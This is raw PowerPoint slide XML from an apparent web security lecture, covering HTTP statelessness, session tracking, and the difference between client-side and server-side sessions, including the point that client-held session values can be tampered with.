                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> JavaScript Exercise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dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Stateless as a Way of Life</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="87043" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1554480"/>
            <a:ext cx="7772400" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>HTTP is stateless</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>The application must implement a method for grouping a series of requests together in a session</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>The application implements a state tracking mechanism</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Server-side code has to identify that each request is part of the same session</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Most languages have built-in support for sessions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Some developers "roll" their own session-tracking code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dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Session Tracking</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="88067" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="533400" y="1584960"/>
            <a:ext cx="7772400" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Server-side code uses some form of data stored at the browser to track sessions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>The server code then tracks this data between requests</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Data is passed between the client and the server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Typically the data is some form of identifier</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>The server can set whatever data it wants</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>May even send all session variables</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>The client is trusted to send the data back unchanged</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0">
              <a:latin typeface="Tahoma" charset="0"/>
              <a:ea typeface="MS PGothic"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85800" y="152400"/>
            <a:ext cx="7772400" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Types of Sessions:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Client-side vs. Server-side</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="89091" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="381000" y="1905000"/>
            <a:ext cx="8382000" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2300" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Client-side: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>All session data is sent to the client</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Very nice for the attacker, because any variables can be altered</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>The application trusts the client not to alter these variables</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:latin typeface="Tahoma" charset="0"/>
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:latin typeface="Tahoma" charset="0"/>
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:latin typeface="Tahoma" charset="0"/>
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:latin typeface="Tahoma" charset="0"/>
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2300" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Server-side: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Session is maintained on the server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Session ID matched to server data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>This one variable can still be altered</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="89092" name="TextBox 3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="304800" y="2874963"/>
            <a:ext cx="1371600" cy="11557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400" dirty="0">
                <a:latin typeface="Times New Roman" charset="0"/>
                <a:cs typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>All session data is sent here as cookie values or hidden form fields</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="89093" name="Text Box 13"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="944563" y="3810000"/>
            <a:ext cx="792162" cy="265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Browser</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="89094" name="Text Box 13"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6858000" y="3810000"/>
            <a:ext cx="1020763" cy="265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Web Server</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="89095" name="TextBox 15"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="2819400" y="3332163"/>
            <a:ext cx="2971800" cy="304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400" dirty="0">
                <a:latin typeface="Times New Roman" charset="0"/>
                <a:cs typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>All session variables are sent to client</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="89096" name="TextBox 3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7239000" y="4703763"/>
            <a:ext cx="1905000" cy="1581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400" dirty="0">
                <a:latin typeface="Times New Roman" charset="0"/>
                <a:cs typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>Session data is stored on the server.  A session ID is generated and when a request with that session ID is received, the server retrieves the data</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="89097" name="Straight Connector 21"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2438400" y="3294063"/>
            <a:ext cx="3886200" cy="1587"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="38100">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd type="triangle" w="lg" len="lg"/>
            <a:tailEnd type="triangle" w="lg" len="lg"/>
          </a:ln>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40dd-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns="" xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:noFill/>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="89098" name="TextBox 15"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="7239000" y="2974975"/>
            <a:ext cx="1143000" cy="73025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400" dirty="0">
                <a:latin typeface="Times New Roman" charset="0"/>
                <a:cs typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>Application sends data to the client</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="89099" name="TextBox 3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="304800" y="5084763"/>
            <a:ext cx="1371600" cy="73025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400" dirty="0">
                <a:latin typeface="Times New Roman" charset="0"/>
                <a:cs typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>Single session ID variable stored here</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="89100" name="Text Box 13"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="868363" y="6019800"/>
            <a:ext cx="792162" cy="265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Browser</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="89101" name="Text Box 13"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5280025" y="6019800"/>
            <a:ext cx="1020763" cy="265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Web Server</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="89102" name="TextBox 15"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="3048000" y="5541963"/>
            <a:ext cx="2971800" cy="304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400" dirty="0">
                <a:latin typeface="Times New Roman" charset="0"/>
                <a:cs typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>One session ID is sent to client</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="89103" name="Straight Connector 21"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2438400" y="5503863"/>
            <a:ext cx="3886200" cy="1587"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="38100">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd type="triangle" w="lg" len="lg"/>
            <a:tailEnd type="triangle" w="lg" len="lg"/>
          </a:ln>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40dd-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns="" xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:noFill/>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:cxnSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="89104"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2971800"/>
            <a:ext cx="609600" cy="871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9105"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2895600"/>
            <a:ext cx="609600" cy="871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9106"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5181600"/>
            <a:ext cx="609600" cy="871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9107"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5181600"/>
            <a:ext cx="609600" cy="871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7" name="Straight Arrow Connector 26"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="6705600" y="2971800"/>
            <a:ext cx="1447800" cy="533400"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">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028" name="Rectangle 3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="152400" y="1981200"/>
            <a:ext cx="5257800" cy="449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buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Web sites are doing more without us knowing it</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>HTTP requests made without user interaction</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Mash-ups combine various applications</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>AJAX and other technologies allow sites to make requests for us</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>We are training our users to expect this type of behavior from web clients</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1029" name="Picture 3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0" y="2038350"/>
            <a:ext cx="628650"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0" name="Freeform 69"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="10800000">
            <a:off x="6172200" y="4267200"/>
            <a:ext cx="2438400" cy="304800"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 2147483647 w 2592"/>
              <a:gd name="T1" fmla="*/ 2147483647 h 192"/>
              <a:gd name="T2" fmla="*/ 0 w 2592"/>
              <a:gd name="T3" fmla="*/ 0 h 192"/>
              <a:gd name="T4" fmla="*/ 2147483647 w 2592"/>
              <a:gd name="T5" fmla="*/ 0 h 192"/>
              <a:gd name="T6" fmla="*/ 2147483647 w 2592"/>
              <a:gd name="T7" fmla="*/ 2147483647 h 192"/>
              <a:gd name="T8" fmla="*/ 0 60000 65536"/>
              <a:gd name="T9" fmla="*/ 0 60000 65536"/>
              <a:gd name="T10" fmla="*/ 0 60000 65536"/>
              <a:gd name="T11" fmla="*/ 0 60000 65536"/>
              <a:gd name="T12" fmla="*/ 0 w 2592"/>
              <a:gd name="T13" fmla="*/ 0 h 192"/>
              <a:gd name="T14" fmla="*/ 2592 w 2592"/>
              <a:gd name="T15" fmla="*/ 192 h 192"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="T8">
                <a:pos x="T0" y="T1"/>
              </a:cxn>
              <a:cxn ang="T9">
                <a:pos x="T2" y="T3"/>
              </a:cxn>
              <a:cxn ang="T10">
                <a:pos x="T4" y="T5"/>
              </a:cxn>
              <a:cxn ang="T11">
                <a:pos x="T6" y="T7"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="T12" t="T13" r="T14" b="T15"/>
            <a:pathLst>
              <a:path w="2592" h="192">
                <a:moveTo>
                  <a:pt x="606" y="192"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2592" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1218" y="192"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:gradFill rotWithShape="0">
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="2F7618"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="66FF33"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="1"/>
          </a:gradFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="none" w="sm" len="sm"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="16389" name="Picture 26"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6172200" y="4572000"/>
            <a:ext cx="2438400" cy="1905000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw dist="38100" dir="2700000" algn="tl" rotWithShape="0">
              <a:srgbClr val="808080">
                <a:alpha val="42998"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1032" name="Text Box 13"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6705600" y="3898900"/>
            <a:ext cx="800100" cy="444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Web </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Browser</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1033" name="Text Box 13"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8429625" y="1787525"/>
            <a:ext cx="714375" cy="269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Google</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1034" name="Text Box 13"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5410200" y="1787525"/>
            <a:ext cx="835025" cy="269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Mash-Up</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1035" name="Text Box 13"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6859588" y="1787525"/>
            <a:ext cx="590550" cy="265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Flickr</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="Cloud 32"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6869113" y="1958975"/>
            <a:ext cx="823912" cy="823913"/>
          </a:xfrm>
          <a:prstGeom prst="cloud">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
            <a:noFill/>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="none" w="med" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1037" name="Straight Connector 20"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
